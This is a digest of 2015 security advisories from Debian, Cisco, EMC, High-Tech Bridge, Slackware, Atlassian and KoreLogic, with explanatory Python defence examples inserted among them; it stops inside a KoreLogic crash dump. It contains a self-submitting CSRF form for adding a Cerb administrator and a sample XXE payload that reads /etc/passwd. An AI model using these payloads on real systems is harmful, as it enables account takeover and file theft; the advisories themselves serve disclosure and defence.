[SECURITY] [DSA 3348-1] qemu security update

2015-09-02 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3348-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
September 02, 2015                    https://www.debian.org/security/faq
- -

Package: qemu
CVE ID : CVE-2015-3214 CVE-2015-5154 CVE-2015-5165 CVE-2015-5225 
 CVE-2015-5745
Debian Bug : 793811 794610 795087 795461 796465

Several vulnerabilities were discovered in qemu, a fast processor
emulator.

CVE-2015-3214

Matt Tait of Google's Project Zero security team discovered a flaw
in the QEMU i8254 PIT emulation. A privileged guest user in a guest
with QEMU PIT emulation enabled could potentially use this flaw to
execute arbitrary code on the host with the privileges of the
hosting QEMU process.

CVE-2015-5154

Kevin Wolf of Red Hat discovered a heap buffer overflow flaw in the
IDE subsystem in QEMU while processing certain ATAPI commands. A
privileged guest user in a guest with the CDROM drive enabled could
potentially use this flaw to execute arbitrary code on the host with
the privileges of the hosting QEMU process.

CVE-2015-5165

Donghai Zhu discovered that the QEMU model of the RTL8139 network
card did not sufficiently validate inputs in the C+ mode offload
emulation, allowing a malicious guest to read uninitialized memory
from the QEMU process's heap.

CVE-2015-5225

Mr Qinghao Tang from QIHU 360 Inc. and Mr Zuozhi from Alibaba Inc
discovered a buffer overflow flaw in the VNC display driver leading
to heap memory corruption. A privileged guest user could use this
flaw to mount a denial of service (QEMU process crash), or
potentially to execute arbitrary code on the host with the
privileges of the hosting QEMU process.

CVE-2015-5745

A buffer overflow vulnerability was discovered in the way QEMU
handles the virtio-serial device. A malicious guest could use this
flaw to mount a denial of service (QEMU process crash).

For the oldstable distribution (wheezy), these problems have been fixed
in version 1.1.2+dfsg-6a+deb7u9. The oldstable distribution is only
affected by CVE-2015-5165 and CVE-2015-5745.

For the stable distribution (jessie), these problems have been fixed in
version 1:2.1+dfsg-12+deb8u2.

For the unstable distribution (sid), these problems have been fixed in
version 1:2.4+dfsg-1a.

We recommend that you upgrade your qemu packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJV5yHbAAoJEAVMuPMTQ89EL2EQAJRkjczhzMQFzfjym14afASB
pr7b2Hu/M5i+hyuSr8Pv8G2zuEw2o60ezqcseuG2153hZs/yX0yk8qltwuTdLdMk
At2FMs98XiD8xKY4mpCKHSdXcY+Cl7cjmogkcUe84dG4xfT5HUTOpZ7b2Ei22gOr
lUmFf5SdG7yhsEk12sne06ArJh7AuDEUa9ltc+cH2+2091itC9DwflRf2y7NmYaf
kM47ZBcMfmUxGbMPPxBV19T2L6ts1zTcPKMkE4FynDDsTzqDg5ndz8clBHKRF70x
ltEXjTD1gLoJkNFGo2UrnfTHlu8UO5OAx1C1si+rtt8/93ran8IXaOO+u/AssqPU
Jzwo2j4zOSLnSMlo722NuneqkneaTQabLM1tROpTOgRTXHmIvG1Uls6Rx5tQOUbZ
wMszAC9aRQZiZ32yjUu0cVu7bsSIRzadNPjW3WzljtRGSEPYUg/pLicnAC+Bq6mu
MOYllYs3nhybZoQ6NjFrJfA+sCjZuNmDhh5a3QUb/cjckygf2QMN8YBSoPy2khqX
y8hTUcrYfmsJo5/rvAkki6kxOJiqK+8+fiw0ARcAOkOIOuP4tcExTwjfNBXtWgR6
ZHZOTA68XdkptRhYnlSfAUkhR06vP6q63k/hjR+7syWu6e9n+4cq/moEdUh+77Xo
ULvsd7J2ar7JOVZ9HpWS
=QpIk
-END PGP SIGNATURE-



[SECURITY] [DSA 3349-1] qemu-kvm security update

2015-09-02 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3349-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
September 02, 2015                    https://www.debian.org/security/faq
- -

Package: qemu-kvm
CVE ID : CVE-2015-5165 CVE-2015-5745

Several vulnerabilities were discovered in qemu-kvm, a full
virtualization solution on x86 hardware.

CVE-2015-5165

Donghai Zhu discovered that the QEMU model of the RTL8139 network
card did not sufficiently validate inputs in the C+ mode offload
emulation, allowing a malicious guest to read uninitialized memory
from the QEMU process's heap.

CVE-2015-5745

A buffer overflow vulnerability was discovered in the way QEMU
handles the virtio-serial device. A malicious guest could use this
flaw to mount a denial of service (QEMU process crash).

For the oldstable distribution (wheezy), these problems have been fixed
in version 1.1.2+dfsg-6+deb7u9.

We recommend that you upgrade your qemu-kvm packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJV5yHRAAoJEAVMuPMTQ89EB2kP/AtJsGcAf37Nthx8tbD6/LUM
6Ou6bDZBoxgFGgtlM9ijK9W1lN9m7UoJBNgOLMGSDha6xCDhUlNk6r/yyR/3bRnh
Ij2xbQwFMvbB8IG88I7H62YpZihY7O/9vqSYW/ZIu7tL4DAQNHctGZ1XocUiHh8i
Ar/gE8bQSDKpx3XG/ZmlniBjozXEcHPc7WDM5eHU1bekwJ5MlO9S+l7ikAptVWMt
fDT7pS1YcGmYftIYtt7MySTHl9F3ThcWBMuY+GeZnF9zQh0N8ltNtvaO87uJ1Oke
qSDzPKoIy6Q1Cw6SEVloBASzsB7BFu7q8S7Zx6DKVDrS43JZNnXj7xX3DXtIGvtC
yXr+xx15tk8oBVYQpg0kBgZjcU5IXC/zjL8KCzj2Nt8+e1w7ufcdgisp9X91hN5c
t/kJmTI8wj0xT0UYCjCfdPLQr1U8ph5fk5coZkt6YVWkWCp1L1fSLDAhkcqM60ql
ORZwyM7m3ZtoMRfAKNdJgjTHTyijE8CAsQDGcINEkhqz26gFuaU5TnkD/Ls5z0cc
ZwTjXpd1VrCYUB0wkdbXWDtsAIZR4nmxl43Z9lOOXRgCMysakmTGYluFW2ypEhrB
fqvXfYzV8assVcLyXnWyq8Ewh7OjX26Y5OlczgxHyBCDp2HK2ragzf93cYJL1v8t
6AheWSuueDqSs2b11Z8J
=9NK7
-END PGP SIGNATURE-



Cisco Security Advisory: Cisco Integrated Management Controller Supervisor and Cisco UCS Director Remote File Overwrite Vulnerability

2015-09-02 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco Security Advisory: Cisco Integrated Management Controller Supervisor and 
Cisco UCS Director Remote File Overwrite Vulnerability

Advisory ID: cisco-sa-20150902-cimcs

Revision 1.0

For Public Release 2015 September 2 16:00  UTC (GMT)

+---

Summary
===
Cisco Integrated Management Controller (IMC) Supervisor and Cisco UCS Director 
contain a remote file overwrite vulnerability that could allow an 
unauthenticated, remote attacker to overwrite arbitrary system files, resulting 
in system instability or a denial of service (DoS) condition.

Cisco has released software updates that address this vulnerability.

Workarounds that mitigate this vulnerability are not available.

This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150902-cimcs

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (SunOS)
-END PGP SIGNATURE-


[SECURITY] [DSA 3347-1] pdns security update

2015-09-02 Thread Sébastien Delafond
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3347-1   secur...@debian.org
https://www.debian.org/security/   Sebastien Delafond
September 02, 2015                    https://www.debian.org/security/faq
- -

Package: pdns
CVE ID : CVE-2015-5230

Pyry Hakulinen and Ashish Shakla at Automattic discovered that pdns,
an authoritative DNS server, was incorrectly processing some DNS
packets; this would enable a remote attacker to trigger a DoS by
sending specially crafted packets causing the server to crash. 

For the stable distribution (jessie), this problem has been fixed in
version 3.4.1-4+deb8u3.

For the testing distribution (stretch) and unstable distribution
(sid), this problem has been fixed in version 3.4.6-1.

We recommend that you upgrade your pdns packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v2

iQEcBAEBCgAGBQJV5wINAAoJEBC+iYPz1Z1kT9AIAJP2pMIbvung1B0EYDD/+YgT
nCqMFEhT+3miAmBMoDiOYE9K4dhLQAHQD+9YEVFfwcF9IV87mkkBhcCK5lLgQqfj
xtNVcrRxCZlI/jdoVAzP6IhMlhkbAgTIFFGxegbIVx9bgsAs1wR2LpiCPZb3SZim
ZaabfmyUMQfN9xlNbptVSNf08iGGvRTm3wAAGRbeM/DqRPjM5Gk/X7O7qlH8Z9mB
04//RtPzyohQOGMWkEF3oqCicVQRHKFIdB6FvJH9r9cnGghjLxgFfeLT1tqrRnDg
csR4renxQZU/3ztReyibd/amTCpqKfe0ixsYR/PE71czqGmgatcptj2E03+UKa4=
=gxuU
-END PGP SIGNATURE-



ESA-2015-137: EMC Atmos XML External Entity Injection Vulnerability

2015-09-02 Thread Security Alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ESA-2015-137: EMC Atmos XML External Entity Injection Vulnerability

EMC Identifier: ESA-2015-137

CVE Identifier: CVE-2015-4538

Severity Rating: CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:S/C:C/I:N/A:P)

Affected products:  
EMC Atmos 2.3.0 and earlier

Summary:  
EMC Atmos includes an XML External Entity Injection vulnerability.

Details:  

EMC Atmos is affected by an XML External Entity (XXE) Injection vulnerability 
due to the configuration of the XML parser shipped with the product. An XXE 
Injection attack may occur when XML input containing a reference to an external 
entity is processed by an affected XML parser. XXE Injection might allow 
attackers to gain unauthorized access to files containing sensitive information 
or might be used to cause a denial of service.
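As an added illustration of the parser-configuration point above (example code written for this page, not EMC's Atmos code), the Python below pre-screens untrusted XML with the standard-library expat parser and refuses any DOCTYPE, entity declaration or external entity reference before the document reaches the application's real parser. The sample documents are constructed, and the function and class names are this example's own; the production fix is to configure the product's actual parser so it never resolves external entities.

```python
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET


class UnsafeXMLError(ValueError):
    """Raised when a document carries a DTD, an entity declaration or an
    external entity reference, i.e. the constructs an XXE payload relies on."""


def _refuse(reason):
    # Build an expat callback that aborts the parse with the given reason.
    def handler(*_args):
        raise UnsafeXMLError(reason)
    return handler


def screen_xml(data: bytes) -> None:
    """Throw-away expat pass that rejects DOCTYPE/ENTITY constructs.

    Raises UnsafeXMLError for DTD machinery and expat.ExpatError for
    malformed input; returns None when the document is plain XML.
    """
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _refuse("DOCTYPE declaration refused")
    parser.EntityDeclHandler = _refuse("entity declaration refused")
    parser.ExternalEntityRefHandler = _refuse("external entity reference refused")
    parser.Parse(data, True)


def parse_hardened(data: bytes) -> ET.Element:
    """Parse untrusted XML only after the screening pass accepted it."""
    screen_xml(data)
    return ET.fromstring(data)


def classify(data: bytes) -> str:
    """Return 'ok', 'malformed', or the refusal reason (useful for logging)."""
    try:
        parse_hardened(data)
    except UnsafeXMLError as exc:
        return str(exc)
    except (ET.ParseError, expat.ExpatError):
        return "malformed"
    return "ok"


# Constructed sample inputs (not taken from the advisory).
BENIGN = b"<objects><object id='1'><name>report.pdf</name></object></objects>"
XXE_PAYLOAD = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE foo [<!ENTITY ext SYSTEM "file:///etc/passwd">]>'
    b'<foo>&ext;</foo>'
)
# An internal entity alone is not XXE, but it uses the same DTD machinery
# (and is the vector for entity-expansion DoS), so the screen refuses it too.
INTERNAL_ENTITY = b'<!DOCTYPE a [<!ENTITY b "bbb">]><a>&b;</a>'

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("xxe", XXE_PAYLOAD),
                       ("internal entity", INTERNAL_ENTITY)):
        print(f"{label:16s} -> {classify(doc)}")
```

The screen is deliberately stricter than "block external entities only": any DOCTYPE is refused, because legitimate API payloads rarely need one and accepting DTDs at all leaves the parser exposed to entity-expansion denial of service.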

Resolution:  
The following EMC Atmos releases contain the fix for this vulnerability:
•   EMC Atmos version 2.3.1.0
•   EMC Atmos version 2.2.3.0 with Hot Fix 2.2.3.426

EMC recommends all customers upgrade at the earliest opportunity. 

Link to remedies:
Customers must contact EMC Customer Technical Support for information about 
applying the hotfixes or upgrading.

Read and use the information in this EMC Security Advisory to assist in 
avoiding any situation that might arise from the problems described herein. If 
you have any questions regarding this product alert, contact EMC Software 
Technical Support at 1-877-534-2867.

For an explanation of Severity Ratings, refer to EMC Knowledgebase solution 
emc218831. EMC recommends all customers take into account both the base score 
and any relevant temporal and environmental scores which may impact the 
potential severity associated with particular security vulnerability.

EMC recommends that all users determine the applicability of this information 
to their individual situations and take appropriate action. The information set 
forth herein is provided "as is" without warranty of any kind. EMC disclaims 
all warranties, either express or implied, including the warranties of 
merchantability, fitness for a particular purpose, title and non-infringement. 
In no event, shall EMC or its suppliers, be liable for any damages whatsoever 
including direct, indirect, incidental, consequential, loss of business profits 
or special damages, even if EMC or its suppliers have been advised of the 
possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for consequential or incidental damages, so the 
foregoing limitation may not apply.


EMC Product Security Response Center
security_al...@emc.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.13 (Cygwin)

iEYEARECAAYFAlXm/cAACgkQtjd2rKp+ALzk4QCeLQ4oZHE7ObleviR6F6z3O8jS
N2oAoOJjL490QBX90zVzssgmRmYRQ7Bd
=SUeP
-END PGP SIGNATURE-


Cross-Site Request Forgery in Cerb

2015-09-02 Thread High-Tech Bridge Security Research
Advisory ID: HTB23269
Product: Cerb
Vendor: Webgroup Media LLC
Vulnerable Version(s): 7.0.3 and probably prior
Tested Version: 7.0.3
Advisory Publication:  August 12, 2015  [without technical details]
Vendor Notification: August 12, 2015 
Vendor Patch: August 14, 2015 
Public Disclosure: September 2, 2015 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-6545
Risk Level: Medium 
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a CSRF vulnerability in the 
Cerb platform, which can be exploited to perform Cross-Site Request Forgery 
attacks against administrators of the vulnerable web application to add 
administrator accounts to the system.  

The vulnerability exists because the "/ajax.php" script fails to properly 
verify the source of incoming HTTP requests. Taking into consideration that 
Cerb is a business-critical application, this security flaw may be quite 
dangerous if exploited by malicious attackers.

The simple exploit below adds an admin user to the system when a logged-in 
victim opens a malicious page containing it:


<form action="http://[host]/ajax.php" method="POST">
  <!-- hidden input fields carrying the request parameters were not preserved in this copy -->
  <input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>

---

Solution:

Update to Cerb 7.0.4

More Information:
https://github.com/wgm/cerb/commit/12de87ff9961a4f3ad2946c8f47dd0c260607144
http://wiki.cerbweb.com/7.0#7.0.4
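The source check the advisory says "/ajax.php" lacked, written out as an added example (this page's own code, not Cerb's and not what the linked commit does): a state-changing POST is accepted only if the browser-supplied Origin (or Referer) names the application's own origin and the form carries the session's CSRF token, compared in constant time. The origin, field name, token and the two sample requests are constructed placeholders.

```python
import hmac
import secrets
from typing import Dict, Tuple
from urllib.parse import urlsplit

# Hypothetical origin of the protected application (placeholder, not Cerb's).
APP_ORIGIN = "https://helpdesk.example.test"
TOKEN_FIELD = "_csrf_token"  # hypothetical form field name


def issue_csrf_token() -> str:
    """Mint an unguessable per-session token; the server keeps it in the
    session and embeds it in every legitimate form it renders."""
    return secrets.token_urlsafe(32)


def _origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def request_is_trusted(headers: Dict[str, str], form: Dict[str, str],
                       session_token: str) -> Tuple[bool, str]:
    """Gate a state-changing POST behind two independent checks.

    A form auto-submitted from a third-party page fails both: the browser
    stamps it with the attacker's Origin, and that page cannot read the
    victim's session token to include it in the form.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    source = lowered.get("origin") or lowered.get("referer")
    if not source:
        return False, "no Origin/Referer header"
    if _origin_of(source) != _origin_of(APP_ORIGIN):
        return False, f"cross-origin request from {_origin_of(source)}"
    submitted = form.get(TOKEN_FIELD, "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not submitted or not hmac.compare_digest(submitted.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed sample requests (not captured traffic); the session token is a
# fixed placeholder so the example is deterministic.
SESSION_TOKEN = "k3KfWv1m9Q2pLzT0aX8cR4nUyB7eH6sD"

FORGED = {  # what a victim's browser sends from an attacker's auto-submitting page
    "headers": {"Origin": "https://attacker.example.test", "Cookie": "session=abc"},
    "form": {"action": "create_account", "role": "admin"},
}
LEGIT = {  # the same action submitted from the application's own form
    "headers": {"Origin": APP_ORIGIN, "Cookie": "session=abc"},
    "form": {"action": "create_account", "role": "admin", TOKEN_FIELD: SESSION_TOKEN},
}

if __name__ == "__main__":
    for label, req in (("forged", FORGED), ("legit", LEGIT)):
        print(label, request_is_trusted(req["headers"], req["form"], SESSION_TOKEN))
```

The token is the primary control; the Origin/Referer comparison is a second line of defence that also gives the server something concrete to log when a cross-site submission is refused.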

---

References:

[1] High-Tech Bridge Advisory HTB23269 - 
https://www.htbridge.com/advisory/HTB23269 - Cross-Site Request Forgery in Cerb.
[2] Cerb - http://www.cerberusweb.com/ - Cerb is a fast and flexible platform 
for enterprise collaboration, productivity, and automation.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



[slackware-security] gdk-pixbuf2 (SSA:2015-244-01)

2015-09-02 Thread Slackware Security Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  gdk-pixbuf2 (SSA:2015-244-01)

New gdk-pixbuf2 packages are available for Slackware 13.37, 14.0, 14.1,
and -current to fix a security issue.


Here are the details from the Slackware 14.1 ChangeLog:
+--+
patches/packages/gdk-pixbuf2-2.28.2-i486-2_slack14.1.txz:  Rebuilt.
  Gustavo Grieco discovered a heap overflow in the processing of BMP images
  which may result in the execution of arbitrary code if a malformed image
  is opened.
  For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4491
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/gdk-pixbuf2-2.23.3-i486-2_slack13.37.txz

Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/gdk-pixbuf2-2.23.3-x86_64-2_slack13.37.txz

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/gdk-pixbuf2-2.26.1-i486-3_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/gdk-pixbuf2-2.26.1-x86_64-3_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/gdk-pixbuf2-2.28.2-i486-2_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/gdk-pixbuf2-2.28.2-x86_64-2_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/gdk-pixbuf2-2.31.7-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/gdk-pixbuf2-2.31.7-x86_64-1.txz


MD5 signatures:
+-+

Slackware 13.37 package:
024660dd36a58ffa0793aeb1396e57c7  gdk-pixbuf2-2.23.3-i486-2_slack13.37.txz

Slackware x86_64 13.37 package:
d9db7b242d5e68f6032f80af8359563d  gdk-pixbuf2-2.23.3-x86_64-2_slack13.37.txz

Slackware 14.0 package:
63d1deaa9e336c09c23025b4d8f8b545  gdk-pixbuf2-2.26.1-i486-3_slack14.0.txz

Slackware x86_64 14.0 package:
c2c2e3211a590b125d9e1e1c61e243ed  gdk-pixbuf2-2.26.1-x86_64-3_slack14.0.txz

Slackware 14.1 package:
0e83c834301e53e29bf47a5d6818769d  gdk-pixbuf2-2.28.2-i486-2_slack14.1.txz

Slackware x86_64 14.1 package:
fcc65f4ec956dcc34f7f378e272e600d  gdk-pixbuf2-2.28.2-x86_64-2_slack14.1.txz

Slackware -current package:
41baa15dd4e8a2b9527d7582aa2902d8  l/gdk-pixbuf2-2.31.7-i586-1.txz

Slackware x86_64 -current package:
35b915dd5a87fec81db379e07652e74a  l/gdk-pixbuf2-2.31.7-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg gdk-pixbuf2-2.28.2-i486-2_slack14.1.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

+------------------------------------------------------------------------+
| To leave the slackware-security mailing list:                          |
+------------------------------------------------------------------------+
| Send an email to majord...@slackware.com with this text in the body of |
| the email message:                                                     |
|                                                                        |
|   unsubscribe slackware-security                                       |
|                                                                        |
| You will get a confirmation message back containing instructions to    |
| complete the process.  Please do not reply to this email address.      |
+------------------------------------------------------------------------+
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iEYEARECAAYFAlXmNWgACgkQakRjwEAQIjNL3ACdGXTddA/8OaDnF+F3MtCC+D1I
54kAn3Qa/pBElZQjCOCnKlIm0FG+hkfI
=sBIZ
-END PGP SIGNATURE-


CVE-2015-5603: JIRA and the HipChat For JIRA plugin - Velocity Template Injection

2015-09-02 Thread David Black
Note: the current version of this advisory can be found at
https://confluence.atlassian.com/x/IcBKLg .

CVE ID: CVE-2015-5603
Product: JIRA and the HipChat for JIRA plugin.
Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0
Affected JIRA product versions: 6.3.5 <= version <  6.4.11


Summary:
This advisory discloses a critical severity security vulnerability
that was introduced in version 1.3.2 of the HipChat for JIRA plugin.
Versions of the HipChat for JIRA plugin starting with 1.3.2 before
6.30.0 (the fixed version) are vulnerable. Vulnerable versions of the
HipChat for JIRA plugin were bundled by default with JIRA since JIRA
version 6.3.5, up to but not including 6.4.11 (the fixed version).

Atlassian Cloud instances have already been upgraded to a version of
the HipChat for JIRA plugin which does not have the issue described in
this email.

Customers who have updated the HipChat For JIRA plugin to version
6.30.0 or higher are not affected.

Customers who have downloaded and installed JIRA >= 6.3.5 <  6.4.11
and have not updated the HipChat For JIRA plugin to 6.30.0 or higher
should either update those instances of the HipChat For JIRA plugin
or their JIRA installations in order to fix this vulnerability.

Customers who have installed the HipChat For JIRA plugin in JIRA, and
are running a version of the plugin equal to or above 1.3.2 and less
than 6.30.0 should either update those instances of the HipChat For
JIRA plugin or their JIRA installations to fix this vulnerability.


Severity:
Atlassian rates the severity level of this vulnerability as critical,
according to the scale published in our Atlassian severity levels
(https://www.atlassian.com/security/security-severity-levels). The
scale allows us to rank a severity as critical, high, moderate, or
low.
This is an independent assessment and you should evaluate its
applicability to your own IT environment.


Description:
We internally discovered that the HipChat For JIRA plugin had a
resource that combined user input into a velocity template source and
subsequently rendered it. Authenticated attackers can use this
vulnerability to execute Java code of their choice on systems that
have a vulnerable version of the HipChat For JIRA plugin enabled. To
exploit this issue attackers need to be able to access the JIRA web
interface and log into JIRA.

All versions of HipChat For JIRA plugin from 1.3.2 before 6.30.0 are
affected by this vulnerability.

All versions of JIRA from 6.3.5 before 6.4.11 are affected by this
vulnerability. This issue can be tracked here:
https://jira.atlassian.com/browse/JRA-44831
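The flaw described above, shown as an added example (this page's own code, not Atlassian's): Python's string.Template stands in for Velocity, because it illustrates the same distinction between a template's source and its data without executing anything. Velocity goes further than substitution (templates can call Java methods), which is why source-level injection there reached code execution; here the same mistake "only" leaks a context value. The CONTEXT dictionary and function names are this example's own.

```python
from string import Template

# Constructed stand-ins for the data a room-notification feature might render.
# "api_token" plays the role of a value that must never reach the user.
CONTEXT = {"issue": "PROJ-42", "api_token": "placeholder-secret-token"}


def render_unsafe(user_input: str) -> str:
    """Flawed pattern: the user's text is concatenated into the template
    *source*, so any template syntax inside it is interpreted, not displayed."""
    source = "Update on $issue: " + user_input
    return Template(source).safe_substitute(CONTEXT)


def render_safe(user_input: str) -> str:
    """Correct pattern: the template source is fixed; the user's text is bound
    to a placeholder as a *value*, so syntax it contains is rendered literally
    (substitution is single-pass and never re-scans substituted text)."""
    source = "Update on $issue: $message"
    return Template(source).safe_substitute(CONTEXT, message=user_input)


def leaks_context(user_input: str) -> bool:
    """True when the unsafe renderer exposes something the safe one does not."""
    return render_unsafe(user_input) != render_safe(user_input)


if __name__ == "__main__":
    for text in ("looks good", "$api_token"):
        print(f"input {text!r}:")
        print("  unsafe ->", render_unsafe(text))
        print("  safe   ->", render_safe(text))
```

For ordinary input the two renderers agree; the difference only appears when the input contains template syntax, which is exactly the case a reviewer should test for whenever user data ends up near a template engine.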


Fix:
We have taken the following steps to address this issue:
Released a new version, 6.30.0, of the HipChat For JIRA plugin
Released JIRA version 6.4.11 that updates the bundled copy of the
HipChat For JIRA plugin to a fixed version.


Remediation:
Upgrade the HipChat for JIRA plugin to version 6.30.0 or higher. For
instructions on how to update add-ons like the HipChat For JIRA plugin
see https://confluence.atlassian.com/display/UPM/Updating+add-ons.
Optionally upgrade JIRA to version 6.4.11 which bundles a fixed
version of the HipChat For JIRA plugin.


Risk Mitigation:
If you are unable to upgrade your JIRA server or the HipChat for JIRA
plugin, then as a temporary workaround, you can disable or uninstall
the HipChat For JIRA plugin in JIRA.


Support:
If you have questions or concerns regarding this advisory, please
raise a support request at https://support.atlassian.com/ .

-- 
David Black / Security Engineer.


KL-001-2015-004 : XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation

2015-09-02 Thread KoreLogic Disclosures
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

KL-001-2015-004 : XGI Windows VGA Display Manager Arbitrary Write
Privilege Escalation

Title: XGI Windows VGA Display Manager Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-004
Publication Date: 2015.09.01
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2015-004.txt


1. Vulnerability Details

 Affected Vendor: Silicon Integrated Systems Corporation
 Affected Product: XGI VGA Display Manager
 Affected Version: 6.14.10.1090
 Platform: Microsoft Windows XP SP3
 CWE Classification: CWE-123: Write-what-where condition
 Impact: Arbitrary Code Execution
 Attack vector: IOCTL
 CVE-ID: CVE-2015-5466

2. Vulnerability Description

 A vulnerability within the xrvkp module allows an attacker
 to inject memory they control into an arbitrary location they
 define. This vulnerability can be used to overwrite function
 pointers in HalDispatchTable resulting in an elevation of
 privilege.

3. Technical Description

 Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
 Product: WinNt, suite: TerminalServer SingleUserTS
 Built by: 2600.xpsp_sp3_qfe.101209-1646
 Machine Name:
 Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0


*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

 Use !analyze -v to get detailed debugging information.
 BugCheck 50, {, 1, 804f3b76, 0}
 Probably caused by : xrvkp.sys ( xrvkp+6ec )
 Followup: MachineOwner
 -

 kd> kn
 Call stack:  # ChildEBP RetAddr
 00 f63fd9a0 8051cc7f nt!KeBugCheckEx+0x1b
 01 f63fda00 805405d4 nt!MmAccessFault+0x8e7
 02 f63fda00 804f3b76 nt!KiTrap0E+0xcc
 03 f63fdad0 804fdaf1 nt!IopCompleteRequest+0x92
 04 f63fdb20 806d3c35 nt!KiDeliverApc+0xb3
 05 f63fdb20 806d3861 hal!HalpApcInterrupt+0xc5
 06 f63fdba8 804fab03 hal!KeReleaseInStackQueuedSpinLock+0x11
 07 f63fdbc8 804f07e4 nt!KeInsertQueueApc+0x4b
 08 f63fdbfc f7b136ec nt!IopfCompleteRequest+0x1d8
 09 f63fdc34 804ee129 xrvkp+0x6ec
 0a f63fdc44 80574e56 nt!IopfCallDriver+0x31
 0b f63fdc58 80575d11 nt!IopSynchronousServiceTail+0x70
 0c f63fdd00 8056e57c nt!IopXxxControlFile+0x5e7
 0d f63fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a
 0e f63fdd34 7c90e514 nt!KiFastCallEntry+0xf8
 0f 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet
 10 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc
 11 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a
 12 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866
 13 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88
